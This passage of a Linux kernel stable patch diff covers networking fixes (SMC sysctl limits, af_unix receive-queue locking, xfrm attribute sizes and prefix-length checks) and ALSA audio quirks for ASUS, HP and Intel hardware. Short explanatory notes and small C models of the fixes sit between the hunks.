+ 	} while (num_rkeys_send || num_rkeys_recv);
+ out:
+-	mutex_unlock(&lgr->rmbs_lock);
++	up_write(&lgr->rmbs_lock);
+ 	return rc;
+ }
+ 
+diff --git a/net/smc/smc_sysctl.c b/net/smc/smc_sysctl.c
+index b6f79fabb9d3f..0b2a957ca5f5f 100644
+--- a/net/smc/smc_sysctl.c
++++ b/net/smc/smc_sysctl.c
+@@ -21,6 +21,10 @@
+ 
+ static int min_sndbuf = SMC_BUF_MIN_SIZE;
+ static int min_rcvbuf = SMC_BUF_MIN_SIZE;
++static int max_sndbuf = INT_MAX / 2;
++static int max_rcvbuf = INT_MAX / 2;
++static const int net_smc_wmem_init = (64 * 1024);
++static const int net_smc_rmem_init = (64 * 1024);
+ 
+ static struct ctl_table smc_table[] = {
+ 	{
+@@ -53,6 +57,7 @@ static struct ctl_table smc_table[] = {
+ 		.mode		= 0644,
+ 		.proc_handler	= proc_dointvec_minmax,
+ 		.extra1		= &min_sndbuf,
++		.extra2		= &max_sndbuf,
+ 	},
+ 	{
+ 		.procname	= "rmem",
+@@ -61,6 +66,7 @@ static struct ctl_table smc_table[] = {
+ 		.mode		= 0644,
+ 		.proc_handler	= proc_dointvec_minmax,
+ 		.extra1		= &min_rcvbuf,
++		.extra2		= &max_rcvbuf,
+ 	},
+ 	{  }
+ };
+@@ -88,8 +94,8 @@ int __net_init smc_sysctl_net_init(struct net *net)
+ 	net->smc.sysctl_autocorking_size = SMC_AUTOCORKING_DEFAULT_SIZE;
+ 	net->smc.sysctl_smcr_buf_type = SMCR_PHYS_CONT_BUFS;
+ 	net->smc.sysctl_smcr_testlink_time = SMC_LLC_TESTLINK_DEFAULT_TIME;
+-	WRITE_ONCE(net->smc.sysctl_wmem, READ_ONCE(net->ipv4.sysctl_tcp_wmem[1]));
+-	WRITE_ONCE(net->smc.sysctl_rmem, READ_ONCE(net->ipv4.sysctl_tcp_rmem[1]));
++	WRITE_ONCE(net->smc.sysctl_wmem, net_smc_wmem_init);
++	WRITE_ONCE(net->smc.sysctl_rmem, net_smc_rmem_init);
+ 
+ 	return 0;
+ 
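
With extra2 wired up, proc_dointvec_minmax() refuses writes outside [extra1, extra2], capping net.smc.wmem/rmem at INT_MAX / 2, presumably so the `bufsize * 2` doubling seen earlier cannot overflow sk_sndbuf. A rough userspace model of that reject-on-write behaviour (the minimum is assumed to be SMC_BUF_MIN_SIZE = 16 KiB; the kernel helper returns -EINVAL rather than clamping):

    #include <errno.h>
    #include <limits.h>
    #include <stdio.h>

    static const int min_sndbuf = 16 * 1024;      /* SMC_BUF_MIN_SIZE, assumed */
    static const int max_sndbuf = INT_MAX / 2;

    /* Models proc_dointvec_minmax(): reject values outside [min, max]. */
    static int sysctl_write(int *ctl, int val)
    {
        if (val < min_sndbuf || val > max_sndbuf)
            return -EINVAL;
        *ctl = val;
        return 0;
    }

    int main(void)
    {
        int wmem = 64 * 1024;                     /* net_smc_wmem_init */

        printf("%d\n", sysctl_write(&wmem, INT_MAX));    /* rejected, -EINVAL */
        printf("%d\n", sysctl_write(&wmem, 128 * 1024)); /* accepted, 0       */
        return 0;
    }
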
+diff --git a/net/unix/af_unix.c b/net/unix/af_unix.c
+index 78fa620a63981..ca31847a6c70c 100644
+--- a/net/unix/af_unix.c
++++ b/net/unix/af_unix.c
+@@ -2290,6 +2290,7 @@ static ssize_t unix_stream_sendpage(struct socket *socket, struct page *page,
+ 
+ 	if (false) {
+ alloc_skb:
++		spin_unlock(&other->sk_receive_queue.lock);
+ 		unix_state_unlock(other);
+ 		mutex_unlock(&unix_sk(other)->iolock);
+ 		newskb = sock_alloc_send_pskb(sk, 0, 0, flags & MSG_DONTWAIT,
+@@ -2329,6 +2330,7 @@ alloc_skb:
+ 		init_scm = false;
+ 	}
+ 
++	spin_lock(&other->sk_receive_queue.lock);
+ 	skb = skb_peek_tail(&other->sk_receive_queue);
+ 	if (tail && tail == skb) {
+ 		skb = newskb;
+@@ -2359,14 +2361,11 @@ alloc_skb:
+ 	refcount_add(size, &sk->sk_wmem_alloc);
+ 
+ 	if (newskb) {
+-		err = unix_scm_to_skb(&scm, skb, false);
+-		if (err)
+-			goto err_state_unlock;
+-		spin_lock(&other->sk_receive_queue.lock);
++		unix_scm_to_skb(&scm, skb, false);
+ 		__skb_queue_tail(&other->sk_receive_queue, newskb);
+-		spin_unlock(&other->sk_receive_queue.lock);
+ 	}
+ 
++	spin_unlock(&other->sk_receive_queue.lock);
+ 	unix_state_unlock(other);
+ 	mutex_unlock(&unix_sk(other)->iolock);
+ 
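
The reshuffle above widens the receive-queue spinlock so that skb_peek_tail() and the eventual __skb_queue_tail() happen in one critical section; the tail skb a sender decides to append after can then no longer be consumed in between. A compressed sketch of the fixed shape, with hypothetical queue helpers standing in for the skb API:

    #include <pthread.h>
    #include <stddef.h>

    struct skb { struct skb *next; };
    struct queue {
        pthread_mutex_t lock;
        struct skb *tail;
    };

    /* Fixed shape: the peek and the append share one lock acquisition,
     * so the observed tail stays valid for the whole decision. */
    static void append_after_tail(struct queue *q, struct skb *nskb)
    {
        pthread_mutex_lock(&q->lock);
        struct skb *tail = q->tail;       /* skb_peek_tail()            */
        if (tail)
            tail->next = nskb;            /* decision based on tail ... */
        q->tail = nskb;                   /* ... and append, atomically */
        pthread_mutex_unlock(&q->lock);
    }

    int main(void)
    {
        struct queue q = { PTHREAD_MUTEX_INITIALIZER, NULL };
        struct skb a = { NULL };

        append_after_tail(&q, &a);
        return 0;
    }
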
+diff --git a/net/xfrm/xfrm_compat.c b/net/xfrm/xfrm_compat.c
+index 8cbf45a8bcdc2..655fe4ff86212 100644
+--- a/net/xfrm/xfrm_compat.c
++++ b/net/xfrm/xfrm_compat.c
+@@ -108,7 +108,7 @@ static const struct nla_policy compat_policy[XFRMA_MAX+1] = {
+ 	[XFRMA_ALG_COMP]	= { .len = sizeof(struct xfrm_algo) },
+ 	[XFRMA_ENCAP]		= { .len = sizeof(struct xfrm_encap_tmpl) },
+ 	[XFRMA_TMPL]		= { .len = sizeof(struct xfrm_user_tmpl) },
+-	[XFRMA_SEC_CTX]		= { .len = sizeof(struct xfrm_sec_ctx) },
++	[XFRMA_SEC_CTX]		= { .len = sizeof(struct xfrm_user_sec_ctx) },
+ 	[XFRMA_LTIME_VAL]	= { .len = sizeof(struct xfrm_lifetime_cur) },
+ 	[XFRMA_REPLAY_VAL]	= { .len = sizeof(struct xfrm_replay_state) },
+ 	[XFRMA_REPLAY_THRESH]	= { .type = NLA_U32 },
+diff --git a/net/xfrm/xfrm_interface_core.c b/net/xfrm/xfrm_interface_core.c
+index 94a3609548b11..d71dbe822096a 100644
+--- a/net/xfrm/xfrm_interface_core.c
++++ b/net/xfrm/xfrm_interface_core.c
+@@ -528,8 +528,8 @@ static netdev_tx_t xfrmi_xmit(struct sk_buff *skb, struct net_device *dev)
+ 
+ 	switch (skb->protocol) {
+ 	case htons(ETH_P_IPV6):
+-		xfrm_decode_session(skb, &fl, AF_INET6);
+ 		memset(IP6CB(skb), 0, sizeof(*IP6CB(skb)));
++		xfrm_decode_session(skb, &fl, AF_INET6);
+ 		if (!dst) {
+ 			fl.u.ip6.flowi6_oif = dev->ifindex;
+ 			fl.u.ip6.flowi6_flags |= FLOWI_FLAG_ANYSRC;
+@@ -543,8 +543,8 @@ static netdev_tx_t xfrmi_xmit(struct sk_buff *skb, struct net_device *dev)
+ 		}
+ 		break;
+ 	case htons(ETH_P_IP):
+-		xfrm_decode_session(skb, &fl, AF_INET);
+ 		memset(IPCB(skb), 0, sizeof(*IPCB(skb)));
++		xfrm_decode_session(skb, &fl, AF_INET);
+ 		if (!dst) {
+ 			struct rtable *rt;
+ 
+diff --git a/net/xfrm/xfrm_user.c b/net/xfrm/xfrm_user.c
+index 2d68a173b2273..d042ca01211fa 100644
+--- a/net/xfrm/xfrm_user.c
++++ b/net/xfrm/xfrm_user.c
+@@ -615,7 +615,7 @@ static void xfrm_update_ae_params(struct xfrm_state *x, struct nlattr **attrs,
+ 	struct nlattr *rt = attrs[XFRMA_REPLAY_THRESH];
+ 	struct nlattr *mt = attrs[XFRMA_MTIMER_THRESH];
+ 
+-	if (re) {
++	if (re && x->replay_esn && x->preplay_esn) {
+ 		struct xfrm_replay_state_esn *replay_esn;
+ 		replay_esn = nla_data(re);
+ 		memcpy(x->replay_esn, replay_esn,
+@@ -1250,6 +1250,15 @@ static int xfrm_dump_sa(struct sk_buff *skb, struct netlink_callback *cb)
+ 					 sizeof(*filter), GFP_KERNEL);
+ 			if (filter == NULL)
+ 				return -ENOMEM;
++
++			/* see addr_match(), (prefix length >> 5) << 2
++			 * will be used to compare xfrm_address_t
++			 */
++			if (filter->splen > (sizeof(xfrm_address_t) << 3) ||
++			    filter->dplen > (sizeof(xfrm_address_t) << 3)) {
++				kfree(filter);
++				return -EINVAL;
++			}
+ 		}
+ 
+ 		if (attrs[XFRMA_PROTO])
+@@ -2960,7 +2969,7 @@ const struct nla_policy xfrma_policy[XFRMA_MAX+1] = {
+ 	[XFRMA_ALG_COMP]	= { .len = sizeof(struct xfrm_algo) },
+ 	[XFRMA_ENCAP]		= { .len = sizeof(struct xfrm_encap_tmpl) },
+ 	[XFRMA_TMPL]		= { .len = sizeof(struct xfrm_user_tmpl) },
+-	[XFRMA_SEC_CTX]		= { .len = sizeof(struct xfrm_sec_ctx) },
++	[XFRMA_SEC_CTX]		= { .len = sizeof(struct xfrm_user_sec_ctx) },
+ 	[XFRMA_LTIME_VAL]	= { .len = sizeof(struct xfrm_lifetime_cur) },
+ 	[XFRMA_REPLAY_VAL]	= { .len = sizeof(struct xfrm_replay_state) },
+ 	[XFRMA_REPLAY_THRESH]	= { .type = NLA_U32 },
+@@ -2980,6 +2989,7 @@ const struct nla_policy xfrma_policy[XFRMA_MAX+1] = {
+ 	[XFRMA_SET_MARK]	= { .type = NLA_U32 },
+ 	[XFRMA_SET_MARK_MASK]	= { .type = NLA_U32 },
+ 	[XFRMA_IF_ID]		= { .type = NLA_U32 },
++	[XFRMA_MTIMER_THRESH]   = { .type = NLA_U32 },
+ };
+ EXPORT_SYMBOL_GPL(xfrma_policy);
+ 
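
The new filter check bounds splen/dplen by the size of xfrm_address_t in bits (sizeof << 3 = 128); anything larger would let addr_match()'s `(prefix >> 5) << 2` byte count walk past the end of the address. The arithmetic in isolation (type layout assumed to match the kernel's 16-byte xfrm_address_t):

    #include <stdio.h>

    typedef struct { unsigned int a[4]; } xfrm_address_t;   /* 16 bytes */

    int main(void)
    {
        unsigned int max_bits = sizeof(xfrm_address_t) << 3;    /* 128 */
        unsigned int splen = 200;             /* hostile filter value */

        /* Bytes addr_match() would touch for a given prefix length. */
        for (unsigned int plen = 0; plen <= max_bits; plen += 32)
            printf("prefix %3u -> compares %2u bytes\n",
                   plen, (plen >> 5) << 2);

        if (splen > max_bits)
            puts("splen 200 rejected with -EINVAL");
        return 0;
    }
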
+diff --git a/sound/hda/hdac_regmap.c b/sound/hda/hdac_regmap.c
+index fe3587547cfec..39610a15bcc98 100644
+--- a/sound/hda/hdac_regmap.c
++++ b/sound/hda/hdac_regmap.c
+@@ -597,10 +597,9 @@ EXPORT_SYMBOL_GPL(snd_hdac_regmap_update_raw_once);
+  */
+ void snd_hdac_regmap_sync(struct hdac_device *codec)
+ {
+-	if (codec->regmap) {
+-		mutex_lock(&codec->regmap_lock);
++	mutex_lock(&codec->regmap_lock);
++	if (codec->regmap)
+ 		regcache_sync(codec->regmap);
+-		mutex_unlock(&codec->regmap_lock);
+-	}
++	mutex_unlock(&codec->regmap_lock);
+ }
+ EXPORT_SYMBOL_GPL(snd_hdac_regmap_sync);
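
The regmap hunk converts a check-then-lock into a lock-then-check: tested outside regmap_lock, codec->regmap can be torn down between the NULL test and regcache_sync(). A minimal sketch of the safe shape (names are illustrative):

    #include <pthread.h>
    #include <stddef.h>

    static pthread_mutex_t regmap_lock = PTHREAD_MUTEX_INITIALIZER;
    static void *regmap;    /* may be set to NULL by a teardown path */

    static void regcache_sync(void *map) { (void)map; }

    static void regmap_sync(void)
    {
        /* Take the lock first; the NULL test is then stable for
         * the whole critical section. */
        pthread_mutex_lock(&regmap_lock);
        if (regmap)
            regcache_sync(regmap);
        pthread_mutex_unlock(&regmap_lock);
    }

    int main(void)
    {
        regmap_sync();
        return 0;
    }
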
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index f93b68a2a8393..aa475154c582f 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -7081,6 +7081,8 @@ enum {
+ 	ALC285_FIXUP_SPEAKER2_TO_DAC1,
+ 	ALC285_FIXUP_ASUS_SPEAKER2_TO_DAC1,
+ 	ALC285_FIXUP_ASUS_HEADSET_MIC,
++	ALC285_FIXUP_ASUS_I2C_SPEAKER2_TO_DAC1,
++	ALC285_FIXUP_ASUS_I2C_HEADSET_MIC,
+ 	ALC280_FIXUP_HP_HEADSET_MIC,
+ 	ALC221_FIXUP_HP_FRONT_MIC,
+ 	ALC292_FIXUP_TPT460,
+@@ -7136,6 +7138,10 @@ enum {
+ 	ALC294_FIXUP_ASUS_DUAL_SPK,
+ 	ALC285_FIXUP_THINKPAD_X1_GEN7,
+ 	ALC285_FIXUP_THINKPAD_HEADSET_JACK,
++	ALC294_FIXUP_ASUS_ALLY,
++	ALC294_FIXUP_ASUS_ALLY_PINS,
++	ALC294_FIXUP_ASUS_ALLY_VERBS,
++	ALC294_FIXUP_ASUS_ALLY_SPEAKER,
+ 	ALC294_FIXUP_ASUS_HPE,
+ 	ALC294_FIXUP_ASUS_COEF_1B,
+ 	ALC294_FIXUP_ASUS_GX502_HP,
+@@ -8069,6 +8075,22 @@ static const struct hda_fixup alc269_fixups[] = {
+ 		.chained = true,
+ 		.chain_id = ALC285_FIXUP_ASUS_SPEAKER2_TO_DAC1
+ 	},
++	[ALC285_FIXUP_ASUS_I2C_SPEAKER2_TO_DAC1] = {
++		.type = HDA_FIXUP_FUNC,
++		.v.func = alc285_fixup_speaker2_to_dac1,
++		.chained = true,
++		.chain_id = ALC287_FIXUP_CS35L41_I2C_2
++	},
++	[ALC285_FIXUP_ASUS_I2C_HEADSET_MIC] = {
++		.type = HDA_FIXUP_PINS,
++		.v.pins = (const struct hda_pintbl[]) {
++			{ 0x19, 0x03a11050 },
++			{ 0x1b, 0x03a11c30 },
++			{ }
++		},
++		.chained = true,
++		.chain_id = ALC285_FIXUP_ASUS_I2C_SPEAKER2_TO_DAC1
++	},
+ 	[ALC256_FIXUP_DELL_INSPIRON_7559_SUBWOOFER] = {
+ 		.type = HDA_FIXUP_PINS,
+ 		.v.pins = (const struct hda_pintbl[]) {
+@@ -8450,6 +8472,47 @@ static const struct hda_fixup alc269_fixups[] = {
+ 		.chained = true,
+ 		.chain_id = ALC294_FIXUP_SPK2_TO_DAC1
+ 	},
++	[ALC294_FIXUP_ASUS_ALLY] = {
++		.type = HDA_FIXUP_FUNC,
++		.v.func = cs35l41_fixup_i2c_two,
++		.chained = true,
++		.chain_id = ALC294_FIXUP_ASUS_ALLY_PINS
++	},
++	[ALC294_FIXUP_ASUS_ALLY_PINS] = {
++		.type = HDA_FIXUP_PINS,
++		.v.pins = (const struct hda_pintbl[]) {
++			{ 0x19, 0x03a11050 },
++			{ 0x1a, 0x03a11c30 },
++			{ 0x21, 0x03211420 },
++			{ }
++		},
++		.chained = true,
++		.chain_id = ALC294_FIXUP_ASUS_ALLY_VERBS
++	},
++	[ALC294_FIXUP_ASUS_ALLY_VERBS] = {
++		.type = HDA_FIXUP_VERBS,
++		.v.verbs = (const struct hda_verb[]) {
++			{ 0x20, AC_VERB_SET_COEF_INDEX, 0x45 },
++			{ 0x20, AC_VERB_SET_PROC_COEF, 0x5089 },
++			{ 0x20, AC_VERB_SET_COEF_INDEX, 0x46 },
++			{ 0x20, AC_VERB_SET_PROC_COEF, 0x0004 },
++			{ 0x20, AC_VERB_SET_COEF_INDEX, 0x47 },
++			{ 0x20, AC_VERB_SET_PROC_COEF, 0xa47a },
++			{ 0x20, AC_VERB_SET_COEF_INDEX, 0x49 },
++			{ 0x20, AC_VERB_SET_PROC_COEF, 0x0049},
++			{ 0x20, AC_VERB_SET_COEF_INDEX, 0x4a },
++			{ 0x20, AC_VERB_SET_PROC_COEF, 0x201b },
++			{ 0x20, AC_VERB_SET_COEF_INDEX, 0x6b },
++			{ 0x20, AC_VERB_SET_PROC_COEF, 0x4278},
++			{ }
++		},
++		.chained = true,
++		.chain_id = ALC294_FIXUP_ASUS_ALLY_SPEAKER
++	},
++	[ALC294_FIXUP_ASUS_ALLY_SPEAKER] = {
++		.type = HDA_FIXUP_FUNC,
++		.v.func = alc285_fixup_speaker2_to_dac1,
++	},
+ 	[ALC285_FIXUP_THINKPAD_X1_GEN7] = {
+ 		.type = HDA_FIXUP_FUNC,
+ 		.v.func = alc285_fixup_thinkpad_x1_gen7,
+@@ -9533,7 +9596,13 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x103c, 0x8b96, "HP", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
+ 	SND_PCI_QUIRK(0x103c, 0x8b97, "HP", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
+ 	SND_PCI_QUIRK(0x103c, 0x8bf0, "HP", ALC236_FIXUP_HP_GPIO_LED),
+-	SND_PCI_QUIRK(0x103c, 0x8c26, "HP HP EliteBook 800G11", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
++	SND_PCI_QUIRK(0x103c, 0x8c46, "HP EliteBook 830 G11", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
++	SND_PCI_QUIRK(0x103c, 0x8c47, "HP EliteBook 840 G11", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
++	SND_PCI_QUIRK(0x103c, 0x8c48, "HP EliteBook 860 G11", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
++	SND_PCI_QUIRK(0x103c, 0x8c49, "HP Elite x360 830 2-in-1 G11", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
++	SND_PCI_QUIRK(0x103c, 0x8c70, "HP EliteBook 835 G11", ALC287_FIXUP_CS35L41_I2C_2_HP_GPIO_LED),
++	SND_PCI_QUIRK(0x103c, 0x8c71, "HP EliteBook 845 G11", ALC287_FIXUP_CS35L41_I2C_2_HP_GPIO_LED),
++	SND_PCI_QUIRK(0x103c, 0x8c72, "HP EliteBook 865 G11", ALC287_FIXUP_CS35L41_I2C_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x1043, 0x103e, "ASUS X540SA", ALC256_FIXUP_ASUS_MIC),
+ 	SND_PCI_QUIRK(0x1043, 0x103f, "ASUS TX300", ALC282_FIXUP_ASUS_TX300),
+ 	SND_PCI_QUIRK(0x1043, 0x106d, "Asus K53BE", ALC269_FIXUP_LIMIT_INT_MIC_BOOST),
+@@ -9553,15 +9622,19 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x1043, 0x1313, "Asus K42JZ", ALC269VB_FIXUP_ASUS_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1043, 0x13b0, "ASUS Z550SA", ALC256_FIXUP_ASUS_MIC),
+ 	SND_PCI_QUIRK(0x1043, 0x1427, "Asus Zenbook UX31E", ALC269VB_FIXUP_ASUS_ZENBOOK),
++	SND_PCI_QUIRK(0x1043, 0x1433, "ASUS GX650P", ALC285_FIXUP_ASUS_I2C_HEADSET_MIC),
++	SND_PCI_QUIRK(0x1043, 0x1463, "Asus GA402X", ALC285_FIXUP_ASUS_I2C_HEADSET_MIC),
+ 	SND_PCI_QUIRK(0x1043, 0x1473, "ASUS GU604V", ALC285_FIXUP_ASUS_HEADSET_MIC),
+ 	SND_PCI_QUIRK(0x1043, 0x1483, "ASUS GU603V", ALC285_FIXUP_ASUS_HEADSET_MIC),
+ 	SND_PCI_QUIRK(0x1043, 0x1517, "Asus Zenbook UX31A", ALC269VB_FIXUP_ASUS_ZENBOOK_UX31A),
++	SND_PCI_QUIRK(0x1043, 0x1573, "ASUS GZ301V", ALC285_FIXUP_ASUS_HEADSET_MIC),
+ 	SND_PCI_QUIRK(0x1043, 0x1662, "ASUS GV301QH", ALC294_FIXUP_ASUS_DUAL_SPK),
+ 	SND_PCI_QUIRK(0x1043, 0x1683, "ASUS UM3402YAR", ALC287_FIXUP_CS35L41_I2C_2),
+ 	SND_PCI_QUIRK(0x1043, 0x16b2, "ASUS GU603", ALC289_FIXUP_ASUS_GA401),
+ 	SND_PCI_QUIRK(0x1043, 0x16e3, "ASUS UX50", ALC269_FIXUP_STEREO_DMIC),
+ 	SND_PCI_QUIRK(0x1043, 0x1740, "ASUS UX430UA", ALC295_FIXUP_ASUS_DACS),
+ 	SND_PCI_QUIRK(0x1043, 0x17d1, "ASUS UX431FL", ALC294_FIXUP_ASUS_DUAL_SPK),
++	SND_PCI_QUIRK(0x1043, 0x17f3, "ROG Ally RC71L_RC71L", ALC294_FIXUP_ASUS_ALLY),
+ 	SND_PCI_QUIRK(0x1043, 0x1881, "ASUS Zephyrus S/M", ALC294_FIXUP_ASUS_GX502_PINS),
+ 	SND_PCI_QUIRK(0x1043, 0x18b1, "Asus MJ401TA", ALC256_FIXUP_ASUS_HEADSET_MIC),
+ 	SND_PCI_QUIRK(0x1043, 0x18f1, "Asus FX505DT", ALC256_FIXUP_ASUS_HEADSET_MIC),
+@@ -10547,6 +10620,7 @@ static int patch_alc269(struct hda_codec *codec)
+ 	spec = codec->spec;
+ 	spec->gen.shared_mic_vref_pin = 0x18;
+ 	codec->power_save_node = 0;
++	spec->en_3kpull_low = true;
+ 
+ #ifdef CONFIG_PM
+ 	codec->patch_ops.suspend = alc269_suspend;
+@@ -10629,14 +10703,16 @@ static int patch_alc269(struct hda_codec *codec)
+ 		spec->shutup = alc256_shutup;
+ 		spec->init_hook = alc256_init;
+ 		spec->gen.mixer_nid = 0; /* ALC256 does not have any loopback mixer path */
+-		if (codec->bus->pci->vendor == PCI_VENDOR_ID_AMD)
+-			spec->en_3kpull_low = true;
++		if (codec->core.vendor_id == 0x10ec0236 &&
++		    codec->bus->pci->vendor != PCI_VENDOR_ID_AMD)
++			spec->en_3kpull_low = false;
+ 		break;
+ 	case 0x10ec0257:
+ 		spec->codec_variant = ALC269_TYPE_ALC257;
+ 		spec->shutup = alc256_shutup;
+ 		spec->init_hook = alc256_init;
+ 		spec->gen.mixer_nid = 0;
++		spec->en_3kpull_low = false;
+ 		break;
+ 	case 0x10ec0215:
+ 	case 0x10ec0245:
+@@ -11268,6 +11344,7 @@ enum {
+ 	ALC897_FIXUP_HP_HSMIC_VERB,
+ 	ALC897_FIXUP_LENOVO_HEADSET_MODE,
+ 	ALC897_FIXUP_HEADSET_MIC_PIN2,
++	ALC897_FIXUP_UNIS_H3C_X500S,
+ };
+ 
+ static const struct hda_fixup alc662_fixups[] = {
+@@ -11707,6 +11784,13 @@ static const struct hda_fixup alc662_fixups[] = {
+ 		.chained = true,
+ 		.chain_id = ALC897_FIXUP_LENOVO_HEADSET_MODE
+ 	},
++	[ALC897_FIXUP_UNIS_H3C_X500S] = {
++		.type = HDA_FIXUP_VERBS,
++		.v.verbs = (const struct hda_verb[]) {
++			{ 0x14, AC_VERB_SET_EAPD_BTLENABLE, 0 },
++			{}
++		},
++	},
+ };
+ 
+ static const struct snd_pci_quirk alc662_fixup_tbl[] = {
+@@ -11868,6 +11952,7 @@ static const struct hda_model_fixup alc662_fixup_models[] = {
+ 	{.id = ALC662_FIXUP_USI_HEADSET_MODE, .name = "usi-headset"},
+ 	{.id = ALC662_FIXUP_LENOVO_MULTI_CODECS, .name = "dual-codecs"},
+ 	{.id = ALC669_FIXUP_ACER_ASPIRE_ETHOS, .name = "aspire-ethos"},
++	{.id = ALC897_FIXUP_UNIS_H3C_X500S, .name = "unis-h3c-x500s"},
+ 	{}
+ };
+ 
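
All of the Realtek entries added above compose through the fixup table's .chained/.chain_id fields: one quirk resolves to a whole sequence of pin overrides, verb writes and function hooks, as with ALC294_FIXUP_ASUS_ALLY -> PINS -> VERBS -> SPEAKER. A toy model of how such a chain might be walked (simplified stand-ins for struct hda_fixup, not the real driver API):

    #include <stdbool.h>
    #include <stdio.h>

    enum { FIX_ALLY, FIX_ALLY_PINS, FIX_ALLY_SPEAKER, FIX_MAX };

    struct fixup {
        const char *desc;
        bool chained;
        int chain_id;
    };

    static const struct fixup fixups[FIX_MAX] = {
        [FIX_ALLY]         = { "bind CS35L41 amps",      true,  FIX_ALLY_PINS },
        [FIX_ALLY_PINS]    = { "override pin defaults",  true,  FIX_ALLY_SPEAKER },
        [FIX_ALLY_SPEAKER] = { "route speaker to DAC1",  false, 0 },
    };

    /* Follow the chain from a device's entry point until an
     * unchained fixup terminates it. */
    static void apply_fixup(int id)
    {
        for (;;) {
            printf("applying: %s\n", fixups[id].desc);
            if (!fixups[id].chained)
                break;
            id = fixups[id].chain_id;
        }
    }

    int main(void)
    {
        apply_fixup(FIX_ALLY);
        return 0;
    }
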
+diff --git a/sound/soc/amd/Kconfig b/sound/soc/amd/Kconfig
+index c88ebd84bdd50..3968c478c9381 100644
+--- a/sound/soc/amd/Kconfig
++++ b/sound/soc/amd/Kconfig
+@@ -81,6 +81,7 @@ config SND_SOC_AMD_VANGOGH_MACH
+ 	tristate "AMD Vangogh support for NAU8821 CS35L41"
+ 	select SND_SOC_NAU8821
+ 	select SND_SOC_CS35L41_SPI
++	select SND_AMD_ACP_CONFIG
+ 	depends on SND_SOC_AMD_ACP5x && I2C && SPI_MASTER
+ 	help
+ 	  This option enables machine driver for Vangogh platform
+diff --git a/sound/soc/amd/vangogh/acp5x.h b/sound/soc/amd/vangogh/acp5x.h
+index bd9f1c5684d17..ac1936a8c43ff 100644
+--- a/sound/soc/amd/vangogh/acp5x.h
++++ b/sound/soc/amd/vangogh/acp5x.h
+@@ -147,6 +147,8 @@ static inline void acp_writel(u32 val, void __iomem *base_addr)
+ 	writel(val, base_addr - ACP5x_PHY_BASE_ADDRESS);
+ }
+ 
++int snd_amd_acp_find_config(struct pci_dev *pci);
++
+ static inline u64 acp_get_byte_count(struct i2s_stream_instance *rtd,
+ 				     int direction)
+ {
+diff --git a/sound/soc/amd/vangogh/pci-acp5x.c b/sound/soc/amd/vangogh/pci-acp5x.c
+index e0df17c88e8e0..c4634a8a17cdc 100644
+--- a/sound/soc/amd/vangogh/pci-acp5x.c
++++ b/sound/soc/amd/vangogh/pci-acp5x.c
+@@ -125,10 +125,15 @@ static int snd_acp5x_probe(struct pci_dev *pci,
+ {
+ 	struct acp5x_dev_data *adata;
+ 	struct platform_device_info pdevinfo[ACP5x_DEVS];
+-	unsigned int irqflags;
++	unsigned int irqflags, flag;
+ 	int ret, i;
+ 	u32 addr, val;
+ 
++	/* Return if acp config flag is defined */
++	flag = snd_amd_acp_find_config(pci);
++	if (flag)
++		return -ENODEV;
++
+ 	irqflags = IRQF_SHARED;
+ 	if (pci->revision != 0x50)
+ 		return -ENODEV;
+diff --git a/sound/soc/codecs/rt5665.c b/sound/soc/codecs/rt5665.c
+index 6e66cc218fa8d..76ff097518c88 100644
+--- a/sound/soc/codecs/rt5665.c
++++ b/sound/soc/codecs/rt5665.c
+@@ -4472,6 +4472,8 @@ static void rt5665_remove(struct snd_soc_component *component)
+ 	struct rt5665_priv *rt5665 = snd_soc_component_get_drvdata(component);
+ 
+ 	regmap_write(rt5665->regmap, RT5665_RESET, 0);
++
++	regulator_bulk_disable(ARRAY_SIZE(rt5665->supplies), rt5665->supplies);
+ }
+ 
+ #ifdef CONFIG_PM
+diff --git a/sound/soc/intel/boards/sof_sdw.c b/sound/soc/intel/boards/sof_sdw.c
+index a37c85d301471..064b6feb76167 100644
+--- a/sound/soc/intel/boards/sof_sdw.c
++++ b/sound/soc/intel/boards/sof_sdw.c
+@@ -374,6 +374,31 @@ static const struct dmi_system_id sof_sdw_quirk_table[] = {
+ 		},
+ 		.driver_data = (void *)(RT711_JD1),
+ 	},
++	{
++		.callback = sof_sdw_quirk_cb,
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "Intel Corporation"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "Meteor Lake Client Platform"),
++		},
++		.driver_data = (void *)(RT711_JD2_100K),
++	},
++	{
++		.callback = sof_sdw_quirk_cb,
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "Google"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "Rex"),
++		},
++		.driver_data = (void *)(SOF_SDW_PCH_DMIC),
++	},
++	/* LunarLake devices */
++	{
++		.callback = sof_sdw_quirk_cb,
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "Intel Corporation"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "Lunar Lake Client Platform"),
++		},
++		.driver_data = (void *)(RT711_JD2_100K),
++	},
+ 	{}
+ };
+ 
+diff --git a/sound/soc/intel/boards/sof_sdw_rt711_sdca.c b/sound/soc/intel/boards/sof_sdw_rt711_sdca.c
+index 7f16304d025be..cf8b9793fe0e5 100644
+--- a/sound/soc/intel/boards/sof_sdw_rt711_sdca.c
++++ b/sound/soc/intel/boards/sof_sdw_rt711_sdca.c
+@@ -143,6 +143,9 @@ int sof_sdw_rt711_sdca_exit(struct snd_soc_card *card, struct snd_soc_dai_link *
+ 	if (!ctx->headset_codec_dev)
+ 		return 0;
+ 
++	if (!SOF_RT711_JDSRC(sof_sdw_quirk))
++		return 0;
++
+ 	device_remove_software_node(ctx->headset_codec_dev);
+ 	put_device(ctx->headset_codec_dev);
+ 
